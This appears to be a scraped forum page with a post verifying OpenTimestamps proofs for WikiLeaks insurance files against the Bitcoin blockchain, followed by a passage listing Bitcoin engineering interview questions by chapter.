zxOCCkm14dXmzGPPFYtOoICPAgb634mPqmbOtV+Kue4KFAS7rKS8Tx5kGMnXS2g9vEAP4ICPEgRmYe0SEqBAMCPOQjrVv/D47Ns+5dufSN+O4yrcXryeoICPEgIu1Hj3eIpQGDEYc2bpKcZAaW+a0TAN5JWjxXrhtZqFQICPEgv2iimFWnNncn43eK5msHFDpUwWqYFPUoev6bGYfJD/MICPEg1s/5RFdmTqS/q/NJG1eoUL2v9TQVd3lDxZyNbsYvTJwICPEg/TZhQWWU0rNDhVKvSPj3X3GNea6EE4yUBAhhdLGjPy0ICPAgzCneKsvkKof2GyiUOLnjvCw3jDM1ybPlQZ6n/QOvL4AICAAFiJYNc9cZAQPUxRrwEH6/ZWrPT26xad0QQcFJjfkI8QRYBlxs8AjjIXKrnwHj3QCD3+MNLvkMjiwraHR0cHM6Ly9ib2IuYnRjLmNhbGVuZGFyLm9wZW50aW1lc3RhbXBzLm9yZw== wikileaks-insurance-20120222.tar.bz2.aes.torrent.ots AE9wZW5UaW1lc3RhbXBzAABQcm9vZgC/ieLohOiSlAEIDH/NcK6gWa9q/t43KjX0HlzU10WgjpSp5HtrO7kysIHwEGekeLNDtc+4EWWKWkj4XucI8CDbjCmAM6VlOoImr8lhBcE1F1X3QSZdK/gKl6WVbn5zoQjwINM3TPOAERCFXSJ5NY99u1msYQL43SxqnFZJENHlsp7CCPAge2XBkc4qKe5znkFpQF1xtuqO2QbxU2RlAlyN16UjN+UI8CBawzF05vi8lM9vEf6XzhmmbLifz03oW9VhEVKuuatioQjwIKkMX472dtv/kdfwdPVY3232Uvl7HymX1A6iukrDzJDhCPEgHLqZCPRWG8m/eU0v7RCUWyrN5uJx1DU9+vlxQphHyDgI8CDq6y5UQHXq7pzlF81Et1lawZ2z0TGynZoEA2rkB1NrrwjxIDG56+af6NmUnS1FbRpawWHv8zZKnF7wZxoZf3bu+sIyCPEg7nUSrpPAX4mpES4o/+l8PNdFV+vMFPg8TBM+8w2YqtYI8SAZLh2NevewJyRUXF52ChFpHOabr6i6Mo7mwW7aS/v0yQj/8BAt3C4ZrTxGWFhhxV/ACNg1CPEEWAZcbPAI6AXGo/xY8BL/AIPf4w0u+QyOLi1odHRwczovL2FsaWNlLmJ0Yy5jYWxlbmRhci5vcGVudGltZXN0YW1wcy5vcmcI8CAJLrM6rEx4XUolY0TMqWReNeDGXGrNnWaGt+0hyBfWkQjwIOQlvN274UpErVwUBT7zDXkML4DH6Th4z+WKtzYCo14PCPAgmjXHUtZc0cJXYRAE2+vx4dErjbhB+QvCnhrmgBfZDYgI8SDCA9m4VpqSYdi2hHpV5Bur4Av2kY+lA1Zd7t6Z0vzykAjwIIDeGEMnR2aQ70cLQaR9l/pzzb1EZdStPwVzynq4nFg4CPAgJmsoMjWrE8P2qCHp6kXXNWKZbVwVlOX7/A04KnZFTnEI8a4BAQAAAAG5/fczGDEa0/xmobo3bThFhenduHgqvJeb7UJ/KsSlpwAAAABIRzBEAiAP+GbjJ4TpZC6ZomEvnsPCDadoRe4jVqjZqu6HYsQ61wIgAMSUFqOaG2zETD2w7LKeF2rXaPRKcELWAwnbxxLLfXwB/f///wJOFDoAAAAAACMhAvRbCJrDfWp3GImDXKg4lfNdqdd67VlH4zc5rE0UqRn3rAAAAAAAAAAAImog8ATRogYACAjxIGTV5io4bVHYyTZ4qGDIUYuvHn6gn6KyFCrYUrlavlHpCAjwIEVbbtmWKlO5t2THHkUuRpCj1J1s3+YN7T0SK45SrfsYCAjwIBsqgPmMiJ2GykxOf5IH/q0K5SiPEZDuxPdWzzF7EMIDCAjxIFEMS1zPMLC4q20xGtcAuqRXuAWk2p8aoX8yMPNQgAU+CAjwIHd/soWBjpd0vQtGIwHIdEfs8TggpJteHV5sxjzxWLTqCAjwIG+t+Jj6pmzrVfirnuChQEu6ykvE8eZBjJ10toPbxAD+CAjxIEZmHtEhKgQDAjzkI61b/w+OzbPuXbn0jfjuMq3F68nqCAjxICLtR493iKUBgxGHNm6SnGQGlvmtEwDeSVo8V64bWahUCAjxIL9oophVpzZ3J+N3iuZrBxQ6VMFqmBT1KHr+mxmHyQ/zCAjxINbP+URXZk6kv6vzSRtXqFC9U0FXd5Q8WcjW7GL0ycCAjxIP02YUFllNKzQ4VSr0j4919xjXmuhBOMlAQIYXSxoz8tCAjwIMwp3irL5CqH9hsolDi547wsN4wzNcmz5UGep/0Dry+ACAgABYiWDXPXGQED1MUa8BB+v2Vqz09usWndEEHBSY35CPEEWAZcbPAI4yFyq58B490Ag9/jDS75DI4sK2h0dHBzOi8vYm9iLmJ0Yy5jYWxlbmRhci5vcGVudGltZXN0YW1wcy5vcmc= wlinsurance-20130815-A.aes256.torrent.ots AE9wZW5UaW1lc3RhbXBzAABQcm9vZgC/ieLohOiSlAEIyK3LDwoGbXfShQBGhJ1sbdzFKnPUpCgOuEV0XohUidLwENpD/C5rWB/RfyzWMF283ssI8SDPExB02U8wBlYOU/shtN747Gp1BzUHtfmvLqeRESvHnwjxIBqzlGQwdP+OaQJO9DWAJ6TCx8Gm9b9DBoMUVLc4rSfxCPAgZRaOuID+vFtcH/M97dhKzHdZZjRdMFjguU5eQtsuMDYI8SCkZNcKTaElNVogwb/FXdR+DvJzNJWyoTiCBwYWMAdFeQjwIKkMX472dtv/kdfwdPVY3232Uvl7HymX1A6iukrDzJDhCPEgHLqZCPRWG8m/eU0v7RCUWyrN5uJx1DU9+vlxQphHyDgI8CDq6y5UQHXq7pzlF81Et1lawZ2z0TGynZoEA2rkB1NrrwjxIDG56+af6NmUnS1FbRpawWHv8zZKnF7wZxoZf3bu+sIyCPEg7nUSrpPAX4mpES4o/+l8PNdFV+vMFPg8TBM+8w2YqtYI8SAZLh2NevewJyRUXF52ChFpHOabr6i6Mo7mwW7aS/v0yQj/8BAt3C4ZrTxGWFhhxV/ACNg1CPEEWAZcbPAI6AXGo/xY8BL/AIPf4w0u+QyOLi1odHRwczovL2FsaWNlLmJ0Yy5jYWxlbmRhci5vcGVudGltZXN0YW1wcy5vcmcI8CAJLrM6rEx4XUolY0TMqWReNeDGXGrNnWaGt+0hyBfWkQjwIOQlvN274UpErVwUBT7zDXkML4DH6Th4z+WKtzYCo14PCPAgmjXHUtZc0cJXYRAE2+vx4dErjbhB+QvCnhrmgBfZDYgI8SDCA9m4VpqSYdi2hHpV5Bur4Av2kY+lA1Zd7t6Z0vzykAjwIIDeGEMnR2aQ70cLQaR9l/pzzb1EZdStPwVzynq4nFg4CPAgJmsoMjWrE8P2qCHp6kXXNWKZbVwVlOX7/A04KnZFTnEI8a4BAQAAAAG5/fczGDEa0/xmobo3bThFhenduHgqvJeb7UJ/KsSlpwAAAABIRzBEAiAP+GbjJ4TpZC6ZomEvnsPCDadoRe4jVqjZqu6HYsQ61wIgAMSUFqOaG2zETD2w7LKeF2rXaPRKcELWAwnbxxLLfXwB/f///wJOFDoAAAAAACMhAvRbCJrDfWp3GImDXKg4lfNdqdd67VlH4zc5rE0UqRn3rAAAAAAAAAAAImog8ATRogYACAjxIGTV5io4bVHYyTZ4qGDIUYuvHn6gn6KyFCrYUrlavlHpCAjwIEVbbtmWKlO5t2THHkUuRpCj1J1s3+YN7T0SK45SrfsYCAjwIBsqgPmMiJ2GykxOf5IH/q0K5SiPEZDuxPdWzzF7EMIDCAjxIFEMS1zPMLC4q20xGtcAuqRXuAWk2p8aoX8yMPNQgAU+CAjwIHd/soWBjpd0vQtGIwHIdEfs8TggpJteHV5sxjzxWLTqCAjwIG+t+Jj6pmzrVfirnuChQEu6ykvE8eZBjJ10toPbxAD+CAjxIEZmHtEhKgQDAjzkI61b/w+OzbPuXbn0jfjuMq3F68nqCAjxICLtR493iKUBgxGHNm6SnGQGlvmtEwDeSVo8V64bWahUCAjxIL9oophVpzZ3J+N3iuZrBxQ6VMFqmBT1KHr+mxmHyQ/zCAjxINbP+URXZk6kv6vzSRtXqFC9U0FXd5Q8WcjW7GL0ycCAjxIP02YUFllNKzQ4VSr0j4919xjXmuhBOMlAQIYXSxoz8tCAjwIMwp3irL5CqH9hsolDi547wsN4wzNcmz5UGep/0Dry+ACAgABYiWDXPXGQED1MUa8BB+v2Vqz09usWndEEHBSY35CPEEWAZcbPAI4yFyq58B490Ag9/jDS75DI4sK2h0dHBzOi8vYm9iLmJ0Yy5jYWxlbmRhci5vcGVudGltZXN0YW1wcy5vcmc= wlinsurance-20130815-B.aes256.torrent.ots AE9wZW5UaW1lc3RhbXBzAABQcm9vZgC/ieLohOiSlAEIVq2gXtAl0TXbPl7gdivPcRaj5cZjVLN/tQek1XrdKSPwEO2lx6UzOFnz24Bx/dToNJoI8CCAFe8K9R+UiJ4QSBodRaRsKzThCKVWkDLZjXhzjISamAjwID7fXZuzTZJXoqie9X50LlKvXiN/1JkfDrGs9n/XU6JLCPEgiUKlqQExsSDv1T8X/W6FvQYPPLMs/M821+TsajW1ln0I8SCkZNcKTaElNVogwb/FXdR+DvJzNJWyoTiCBwYWMAdFeQjwIKkMX472dtv/kdfwdPVY3232Uvl7HymX1A6iukrDzJDhCPEgHLqZCPRWG8m/eU0v7RCUWyrN5uJx1DU9+vlxQphHyDgI8CDq6y5UQHXq7pzlF81Et1lawZ2z0TGynZoEA2rkB1NrrwjxIDG56+af6NmUnS1FbRpawWHv8zZKnF7wZxoZf3bu+sIyCPEg7nUSrpPAX4mpES4o/+l8PNdFV+vMFPg8TBM+8w2YqtYI8SAZLh2NevewJyRUXF52ChFpHOabr6i6Mo7mwW7aS/v0yQj/8BAt3C4ZrTxGWFhhxV/ACNg1CPEEWAZcbPAI6AXGo/xY8BL/AIPf4w0u+QyOLi1odHRwczovL2FsaWNlLmJ0Yy5jYWxlbmRhci5vcGVudGltZXN0YW1wcy5vcmcI8CAJLrM6rEx4XUolY0TMqWReNeDGXGrNnWaGt+0hyBfWkQjwIOQlvN274UpErVwUBT7zDXkML4DH6Th4z+WKtzYCo14PCPAgmjXHUtZc0cJXYRAE2+vx4dErjbhB+QvCnhrmgBfZDYgI8SDCA9m4VpqSYdi2hHpV5Bur4Av2kY+lA1Zd7t6Z0vzykAjwIIDeGEMnR2aQ70cLQaR9l/pzzb1EZdStPwVzynq4nFg4CPAgJmsoMjWrE8P2qCHp6kXXNWKZbVwVlOX7/A04KnZFTnEI8a4BAQAAAAG5/fczGDEa0/xmobo3bThFhenduHgqvJeb7UJ/KsSlpwAAAABIRzBEAiAP+GbjJ4TpZC6ZomEvnsPCDadoRe4jVqjZqu6HYsQ61wIgAMSUFqOaG2zETD2w7LKeF2rXaPRKcELWAwnbxxLLfXwB/f///wJOFDoAAAAAACMhAvRbCJrDfWp3GImDXKg4lfNdqdd67VlH4zc5rE0UqRn3rAAAAAAAAAAAImog8ATRogYACAjxIGTV5io4bVHYyTZ4qGDIUYuvHn6gn6KyFCrYUrlavlHpCAjwIEVbbtmWKlO5t2THHkUuRpCj1J1s3+YN7T0SK45SrfsYCAjwIBsqgPmMiJ2GykxOf5IH/q0K5SiPEZDuxPdWzzF7EMIDCAjxIFEMS1zPMLC4q20xGtcAuqRXuAWk2p8aoX8yMPNQgAU+CAjwIHd/soWBjpd0vQtGIwHIdEfs8TggpJteHV5sxjzxWLTqCAjwIG+t+Jj6pmzrVfirnuChQEu6ykvE8eZBjJ10toPbxAD+CAjxIEZmHtEhKgQDAjzkI61b/w+OzbPuXbn0jfjuMq3F68nqCAjxICLtR493iKUBgxGHNm6SnGQGlvmtEwDeSVo8V64bWahUCAjxIL9oophVpzZ3J+N3iuZrBxQ6VMFqmBT1KHr+mxmHyQ/zCAjxINbP+URXZk6kv6vzSRtXqFC9U0FXd5Q8WcjW7GL0ycCAjxIP02YUFllNKzQ4VSr0j4919xjXmuhBOMlAQIYXSxoz8tCAjwIMwp3irL5CqH9hsolDi547wsN4wzNcmz5UGep/0Dry+ACAgABYiWDXPXGQED1MUa8BB+v2Vqz09usWndEEHBSY35CPEEWAZcbPAI4yFyq58B490Ag9/jDS75DI4sK2h0dHBzOi8vYm9iLmJ0Yy5jYWxlbmRhci5vcGVudGltZXN0YW1wcy5vcmc= wlinsurance-20130815-C.aes256.torrent.ots AE9wZW5UaW1lc3RhbXBzAABQcm9vZgC/ieLohOiSlAEIHxwg7bbkxpMAoZjqjFyF3ls2gNeEHYLJOrh1wun0ctrwEFi2OueyJJWy2pXF4T8wKGsI8SCcsZ6cdQgf9XMUQyh8Ys2Vdrz4d/MgCs8AdVaYLUrdPgjwID7fXZuzTZJXoqie9X50LlKvXiN/1JkfDrGs9n/XU6JLCPEgiUKlqQExsSDv1T8X/W6FvQYPPLMs/M821+TsajW1ln0I8SCkZNcKTaElNVogwb/FXdR+DvJzNJWyoTiCBwYWMAdFeQjwIKkMX472dtv/kdfwdPVY3232Uvl7HymX1A6iukrDzJDhCPEgHLqZCPRWG8m/eU0v7RCUWyrN5uJx1DU9+vlxQphHyDgI8CDq6y5UQHXq7pzlF81Et1lawZ2z0TGynZoEA2rkB1NrrwjxIDG56+af6NmUnS1FbRpawWHv8zZKnF7wZxoZf3bu+sIyCPEg7nUSrpPAX4mpES4o/+l8PNdFV+vMFPg8TBM+8w2YqtYI8SAZLh2NevewJyRUXF52ChFpHOabr6i6Mo7mwW7aS/v0yQj/8BAt3C4ZrTxGWFhhxV/ACNg1CPEEWAZcbPAI6AXGo/xY8BL/AIPf4w0u+QyOLi1odHRwczovL2FsaWNlLmJ0Yy5jYWxlbmRhci5vcGVudGltZXN0YW1wcy5vcmcI8CAJLrM6rEx4XUolY0TMqWReNeDGXGrNnWaGt+0hyBfWkQjwIOQlvN274UpErVwUBT7zDXkML4DH6Th4z+WKtzYCo14PCPAgmjXHUtZc0cJXYRAE2+vx4dErjbhB+QvCnhrmgBfZDYgI8SDCA9m4VpqSYdi2hHpV5Bur4Av2kY+lA1Zd7t6Z0vzykAjwIIDeGEMnR2aQ70cLQaR9l/pzzb1EZdStPwVzynq4nFg4CPAgJmsoMjWrE8P2qCHp6kXXNWKZbVwVlOX7/A04KnZFTnEI8a4BAQAAAAG5/fczGDEa0/xmobo3bThFhenduHgqvJeb7UJ/KsSlpwAAAABIRzBEAiAP+GbjJ4TpZC6ZomEvnsPCDadoRe4jVqjZqu6HYsQ61wIgAMSUFqOaG2zETD2w7LKeF2rXaPRKcELWAwnbxxLLfXwB/f///wJOFDoAAAAAACMhAvRbCJrDfWp3GImDXKg4lfNdqdd67VlH4zc5rE0UqRn3rAAAAAAAAAAAImog8ATRogYACAjxIGTV5io4bVHYyTZ4qGDIUYuvHn6gn6KyFCrYUrlavlHpCAjwIEVbbtmWKlO5t2THHkUuRpCj1J1s3+YN7T0SK45SrfsYCAjwIBsqgPmMiJ2GykxOf5IH/q0K5SiPEZDuxPdWzzF7EMIDCAjxIFEMS1zPMLC4q20xGtcAuqRXuAWk2p8aoX8yMPNQgAU+CAjwIHd/soWBjpd0vQtGIwHIdEfs8TggpJteHV5sxjzxWLTqCAjwIG+t+Jj6pmzrVfirnuChQEu6ykvE8eZBjJ10toPbxAD+CAjxIEZmHtEhKgQDAjzkI61b/w+OzbPuXbn0jfjuMq3F68nqCAjxICLtR493iKUBgxGHNm6SnGQGlvmtEwDeSVo8V64bWahUCAjxIL9oophVpzZ3J+N3iuZrBxQ6VMFqmBT1KHr+mxmHyQ/zCAjxINbP+URXZk6kv6vzSRtXqFC9U0FXd5Q8WcjW7GL0ycCAjxIP02YUFllNKzQ4VSr0j4919xjXmuhBOMlAQIYXSxoz8tCAjwIMwp3irL5CqH9hsolDi547wsN4wzNcmz5UGep/0Dry+ACAgABYiWDXPXGQED1MUa8BB+v2Vqz09usWndEEHBSY35CPEEWAZcbPAI4yFyq58B490Ag9/jDS75DI4sK2h0dHBzOi8vYm9iLmJ0Yy5jYWxlbmRhci5vcGVudGltZXN0YW1wcy5vcmc= 
Now You Verify
ots verify 2016-06-03_insurance.aes256.torrent.ots ots info 2016-06-03_insurance.aes256.torrent.ots 
RESULTS??
File sha256 hash: 620ec1c72a087f39da0ed4544b13661959243861d94de32bc467e22bd156b2c8 Timestamp: append 29fe731075a6325e3ffbb0cd1871a8cb sha256 prepend 7b53831e1922ef3f47d26a126a02105e21a286a29cbd397b9720491651debd07 sha256 append 47d83ba5d8ce0a068140331cbee71f5ff3b008225b24befa2ee4e60ef9680043 sha256 prepend 275b39e174ea9a8c74b3d9a85e9807f8d72b6d72c8f54a36c62a71c0548043a4 sha256 append 1cd223158f4023cb2a807aa3a60a2bfc9b2f22ee901bc202079e31ad7e3939d0 sha256 append 2f238c371910a1abf964bf5ad0f6cb3f1da068670bee17db74adf5583183ec23 sha256 append dc657c3817005a8347307b53826d0a48edeba46af77c85594729a4dfe5436cc4 sha256 append 33793069cd3c71cf31ba4a7efde4063955b7e0b6e2850624ea6aa65a4a11ff37 sha256 append 677e1d161cb3fd7390e2e0ee0d0e7e40d31b6a4ceba337354839626cbc3f74fe sha256 append 3b474f156340b0a25258e5786db4eb3ee9c7cd1be1bfc6690b10f24bd7538dc6 sha256 append 6557f1dfc6d6826dd856035a9abe684c4ea1461f99d4fec62231ff75b5a28cd0 sha256 append 2757ecddf0596631dde0c21469f53ef5acc106035705eb669ff7a455cd3198ad sha256 -> append 7ebf656acf4f6eb169dd1041c1498df9 sha256 prepend 58065c6c append e32172ab9f01e3dd verify PendingAttestation('https://bob.btc.calendar.opentimestamps.org') -> append 2ddc2e19ad3c46585861c55fc008d835 sha256 prepend 58065c6c append e805c6a3fc58f012 verify PendingAttestation('https://alice.btc.calendar.opentimestamps.org') sha256 append 092eb33aac4c785d4a256344cca9645e35e0c65c6acd9d6686b7ed21c817d691 sha256 append e425bcddbbe14a44ad5c14053ef30d790c2f80c7e93878cfe58ab73602a35e0f sha256 append 9a35c752d65cd1c257611004dbebf1e1d12b8db841f90bc29e1ae68017d90d88 sha256 prepend c203d9b8569a9261d8b6847a55e41babe00bf6918fa503565deede99d2fcf290 sha256 append 80de184327476690ef470b41a47d97fa73cdbd4465d4ad3f0573ca7ab89c5838 sha256 append 266b283235ab13c3f6a821e9ea45d73562996d5c1594e5fbfc0d382a76454e71 sha256 prepend 0100000001b9fdf73318311ad3fc66a1ba376d384585e9ddb8782abc979bed427f2ac4a5a7000000004847304402200ff866e32784e9642e99a2612f9ec3c20da76845ee2356a8d9aaee8762c43ad7022000c49416a39a1b6cc44c3db0ecb29e176ad768f44a7042d60309dbc712cb7d7c01fdffffff024e143a0000000000232102f45b089ac37d6a771889835ca83895f35da9d77aed5947e33739ac4d14a919f7ac0000000000000000226a20 append d1a20600 sha256 sha256 prepend 64d5e62a386d51d8c93678a860c8518baf1e7ea09fa2b2142ad852b95abe51e9 sha256 sha256 append 455b6ed9962a53b9b764c71e452e4690a3d49d6cdfe60ded3d122b8e52adfb18 sha256 sha256 append 1b2a80f98c889d86ca4c4e7f9207fead0ae5288f1190eec4f756cf317b10c203 sha256 sha256 prepend 510c4b5ccf30b0b8ab6d311ad700baa457b805a4da9f1aa17f3230f35080053e sha256 sha256 append 777fb285818e9774bd0b462301c87447ecf13820a49b5e1d5e6cc63cf158b4ea sha256 sha256 append 6fadf898faa66ceb55f8ab9ee0a1404bbaca4bc4f1e6418c9d74b683dbc400fe sha256 sha256 prepend 46661ed1212a0403023ce423ad5bff0f8ecdb3ee5db9f48df8ee32adc5ebc9ea sha256 sha256 prepend 22ed478f7788a501831187366e929c640696f9ad1300de495a3c57ae1b59a854 sha256 sha256 prepend bf68a29855a7367727e3778ae66b07143a54c16a9814f5287afe9b1987c90ff3 sha256 sha256 prepend d6cff94457664ea4bfabf3491b57a850bdaff53415777943c59c8d6ec62f4c9c sha256 sha256 prepend fd3661416594d2b3438552af48f8f75f718d79ae84138c9404086174b1a33f2d sha256 sha256 append cc29de2acbe42a87f61b289438b9e3bc2c378c3335c9b3e5419ea7fd03af2f80 sha256 sha256 verify BitcoinBlockHeaderAttestation(434900) 
bitcoin block 434900 blockhash 00000000000000000360c7470ddfb09df16421140688cd1aee88949e7b779c6d 2016-10-16
!!!
DatuIntegrityEntity
submitted by DataIntegrityEntity to WikiLeaks [link] [comments]

Great interview questions for bitcoin engineers

From here...
https://bitcointalk.org/index.php?topic=5006583.0
Questions. Chapter 1: Introduction 1. What are the main Bitcoin terms? 2. What is a Bitcoin address? 3. What is a Bitcoin transaction? 4. What is a Bitcoin block? 5. What is a Bitcoin blockchain? 6. What is a Bitcoin transaction ledger? 7. What is a Bitcoin system? What is a bitcoin (cryptocurrency)? How are they different? 8. What is a full Bitcoin stack? 9. What are two types of issues that digital money have to address? 10. What is a “double-spend” problem? 11. What is a distributed computing problem? What is the other name of this problem? 12. What is an election? 13. What is a consensus? 14. What is the name of the main algorithm that brings the bitcoin network to the consensus? 15. What are the different types of bitcoin clients? What is the difference between these clients? Which client offers the most flexibility? Which client offers the least flexibility? Which client is the most and least secure? 16. What is a bitcoin wallet? 17. What is a confirmed transaction and what is an unconfirmed transaction? Chapter 2: How Bitcoin works. 1. What is the best way to understand transactions in the Bitcoin network? 2. What is a transaction? What does it contain? What is the similarity of a transaction to a double entry ledger? What does input correspond to? What does output correspond to? 3. What are the typical transactions in the bitcoin network? Could you please name three of such transactions and give examples of each type of the transaction? 4. What is a QR and how it is used in the Bitcoin network? Are there different types of QRs? If so, what are the different types? Which type is more informational? What kind of information does it provide? 5. What is SPV? What does this procedure check and what type of clients of the Bitcoin network usually use this procedure? Chapter 3: The Bitcoin client. 1. How to download and install the Core Bitcoin client? 2. What is the best way to test the API available for the Core Bitcoin client without actually programming? What is the interface called? 3. What are the major areas of operations in the Bitcoin client? What can we do with the client? 4. What are the available operations for the Bitcoin addresses? 5. What are the available read operations for the Bitcoin transactions? How is a transaction encoded in the Bitcoin network? What is a raw transaction and what is a decoded transaction? 6. If I want to get information about a transaction that is not related to any address in my own wallet, do I need to change anything in the Bitcoin client configuration? If yes, which option do I need to modify? 7. What are the available read operation for the Bitcoin blocks? 8. What are the available operations for the creation of the transactions in the Bitcoin network? 9. How do you normally need to address the unspent output from the previous transaction in order to use it as an input for a new transaction? 10. What is the mandatory operation after creating a new transaction and before sending this new transaction to the network? What state does the wallet have to be in order to perform this operation? 11. Is the transaction ID immutable (TXID)? If not why, if yes, why and when? 12. What does signing a transaction mean? 13. What are the other options for Bitcoin clients? Are there any libraries that are written for some specific languages? What types of clients do these libraries implement? Chapter 4: Keys, Addresses and Wallets. 1. What is a PKC? When it was developed? What are the main mathematical foundations or functions that PKC is using? 2. What is ECC? Could you please provide the formula of the EC? What is the p and what is the Fp? What are the defined operations in ECC? What is a “point to infinity”? 3. What is a Bitcoin wallet? Does this wallet contain coins? If not, what does it contain then? 4. What is a BIP? What it is used for? 5. What is an encrypted private key? Why would we want to encrypt private keys? 6. What is a paper wallet? What kind of storage it is an example of? 7. What is a nondeterministic wallet? Is it a good wallet or a bad wallet? Could you justify? 8. What is a deterministic wallet? 9. What is an HD wallet? 10. How many keys are needed for one in and out transaction? What is a key pair? Which keys are in the key pair? 11. How many keys are stored in a wallet? 12. How does a public key gets created in Bitcoin? What is a “generator point”? 13. Could you please show on a picture how ECC multiplication is done? 14. How does a private key gets created in Bitcoin? What we should be aware of when creating a new private key? What is CSPRNG? What kind of input should this function be getting? 15. What is a WIF? What is WIF-Compressed? 16. What is Base58 encoding and what is Base58Check encoding? How it is different from Base64 encoding? Which characters are used in Base58? Why Base58Check was invented? What kind of problems does it solve? How is Base58Check encoding is created from Base58 encoding? 17. How can Bitcoin addresses be encoded? Which different encodings are used? Which key is used for the address creation? How is the address created? How this key is used and what is the used formula? 18. Can we visually distinguish between different keys in Base58Check format? If yes, how are they different from each other? What kind of prefixes are used? Could you please provide information about used prefixes for each type of the key? 19. What is an index in HD wallets? How many siblings can exist for a parent in an HD wallet? 20. What is the depth limitation for an HD wallet key hierarchy? 21. What are the main two advantages of an HD wallet comparing to the nondeterministic wallets? 22. What are the risks of non-hardened keys creation in an HD wallet? Could you please describe each of them? 23. What is a chain code in HD wallets? How many different chain code types there are? 24. What is the mnemonic code words? What are they used for? 25. What is a seed in an HD wallet? Is there any other name for it? 26. What is an extended key? How long is it and which parts does it consist of? 27. What is P2SH address? What function are P2SH addresses normally used for? Is that correct to call P2SH address a multi-sig address? Which BIP suggested using P2SH addresses? 28. What is a WIF-compressed private key? Is there such a thing as a compressed private key? Is there such a thing as a compressed public key? 29. What is a vanity address? 30. What is a vanity pool? 31. What is a P2PKH address? What is the prefix for the P2PKH address? 32. How does the owner prove that he is the real owner of some address? What does he have to represent to the network to prove the ownership? Why a perpetrator cannot copy this information and reuse it in the next transactions? 33. What is the rule for using funds that are secured by a cold storage wallet? How many times you can send to the address that is protected by the private key stored in a cold storage? How many times can you send funds from the address that is protected by the private key stored in a cold storage? Chapter 5: Transactions. 1. What is a transaction in Bitcoin? Why is it the most important operation in the Bitcoin ecosystem? 2. What is UTXO? What is one of the important rules of the UTXO? 3. Which language is used to write scripts in Bitcoin ecosystem? What are the features of this language? Which language does it look like? What are the limitations of this language? 4. What is the structure of a transaction? What does transaction consists of? 5. What are the standard transactions in Bitcoin? How many standard transactions there are (as of 2014)? 6. What is a “locking script” and what is an “unlocking script”? What is inside these scripts for a usual operation of P2PKH? What is a signature? Could you please describe in details how locking and unlocking scripts work and draw the necessary diagrams? 7. What is a transaction fee? What does the transaction fee depend on? 8. If you are manually creating transactions, what should you be very careful about? 9. Could you please provide a real life scenario when you might need a P2SH payment and operation? 10. What is the Script operation that is used to store in the blockchain some important data? Is it a good practice? Explain your answer. Chapter 6: The Bitcoin Network. 1. What is the network used in Bitcoin? What is it called? What is the abbreviation? What is the difference between this network architecture and the other network architectures? Could you please describe another network architecture and compare the Bitcoin network and the other network architectures? 2. What is a Bitcoin network? What is an extended Bitcoin network? What is the difference between those two networks? What are the other protocols used in the extended Bitcoin network? Why are these new protocols used? Can you give an example of one such protocol? What is it called? 3. What are the main functions of a bitcoin node? How many of them there are? Could you please name and describe each of them? Which functions are mandatory? 4. What is a full node in the Bitcoin network? What does it do and how does it differ from the other nodes? 5. What is a lightweight node in the Bitcoin network? What is another name of the lightweight node? How lightweight node checks transactions? 6. What are the main problems in the SPV process? What does SPV stand for? How does SPV work and what does it rely on? 7. What is a Sybil attack? 8. What is a transaction pool? Where are transaction pools stored in a Bitcoin network client? What are the two different transaction pools usually available in implementations? 9. What is the main Bitcoin client used in the network? What is the official name of the client and what is an unofficial name of this client? 10. What is UTXO pool? Do all clients keep this pool? Where is it stored? How does it differ from the transaction pools? 11. What is a Bloom filter? Why are Bloom filters used in the Bitcoin network? Were they originally used in the initial SW or were they introduced with a specific BIP? Chapter 7: The Blockchain. 1. What is a blockchain? 2. What is a block hash? Is it really a block hash or is it a hash of something else? 3. What is included in the block? What kind of information? 4. How many parents can one block have? 5. How many children can one block have? Is it a temporary or permanent state of the blockchain? What is the name of this state of the blockchain? 6. What is a Merkle tree? Why does Bitcoin network use Merkle trees? What is the advantage of using Merkle trees? What is the other name of the Merkle tree? What kind of form must this tree have? 7. How are blocks identified in the blockchain? What are the two commonly used identities? Are these identities stored in the blockchain? 8. What is the average size of one transaction? How many transactions are normally in one block? What is the size of a block header? 9. What kind of information do SPV nodes download? How much space do they save by that comparing to what they would need if they had to download the whole blockchain? 10. What is a usual representation of a blockchain? 11. What is a genesis block? Do clients download this block and if yes – where from? What is the number of the genesis block? 12. What is a Merkle root? What is a Merkle path? Chapter 8: Mining and Consensus. 1. What is the main purpose of mining? Is it to get the new coins for the miners? Alternatively, it is something else? Is mining the right or good term to describe the process? 2. What is PoW algorithm? 3. What are the two main incentives for miners to participate in the Bitcoin network? What is the current main incentive and will it be changed in the future? 4. Is the money supply in the Bitcoin network diminishing? If so, what is the diminishing rate? What was the original Bitcoin supply rate and how is it changed over time? Is the diminishing rate time related or rather block related? 5. What is the maximum number of Bitcoins available in the network after all the Bitcoins have been mined? When will all the Bitcoins be mined? 6. What is a decentralized consensus? What is a usual setup to clear transactions? What does a clearinghouse do? 7. What is deflationary money? Are they good or bad usually? What is the bad example of deflationary spiral? 8. What is an emergent consensus? What is the feature of emergent consensus? How does it differ from a usual consensus? What are the main processes out of which this emergent decentralized consensus becomes true? 9. Could you please describe the process of Independent Transaction Verification? What is the list of criteria that are checked against a newly received transaction? Where can these rules be checked? Can they be changed over time? If yes, why would they be changed? 10. Does mining node have to be a full node? If not, what are the other options for a node that is not full to be a mining node? 11. What is a candidate block? What types of nodes in the Bitcoin network create candidate blocks? What is a memory pool? Is there any other name of the memory pool? What are the transactions kept in this memory pool? 12. How are transactions added to the candidate block? How does a candidate block become a valid block? 13. What is the minimum value in the Bitcoin network? What is it called and what is the value? Are there any alternative names? 14. What is the age of the UTXO? 15. How is the priority of a transaction is calculated? What is the exact formula? What are the units of each contributing member? When is a transaction considered to be old? Can low priority transactions carry a zero fee? Will they be processed in this case? 16. How much size in each block is reserved for high priority transactions? How are transactions prioritized for the remaining space? 17. Do transactions expire in Bitcoin? Can transactions disappear in the Bitcoin network? If yes, could you please describe such scenario? 18. What is a generation transaction? Does it have another name? If it does, what is the other name of the transaction? What is the position of the generation transaction in the block? Does it have an input? Is the input usual UTXO? If not – what is the input called? How many outputs there are for the generation transaction? 19. What is the Coinbase data? What is it currently used for? 20. What is little-endian and big-endian formats? Could you please give an example of both? 21. How is the block header constructed? Which fields are calculated and added to the block header? Could you please describe the steps for calculation of the block header fields? 22. What is a mantissa-exponent encoding? How is this encoding used in the Bitcoin network? What is the difficulty target? What is the actual process of mining? What kind of mathematical calculation is executed to conduct mining? 23. Which hash function is used in the Bitcoin mining process? 24. Could you describe the PoW algorithm? What features of the hash function does it depend on? What is the other name of the hash function? What is a nonce? How can we increase the difficulty of the PoW calculation? What do we need to change and how do we need to change this parameter? 25. What is difficulty 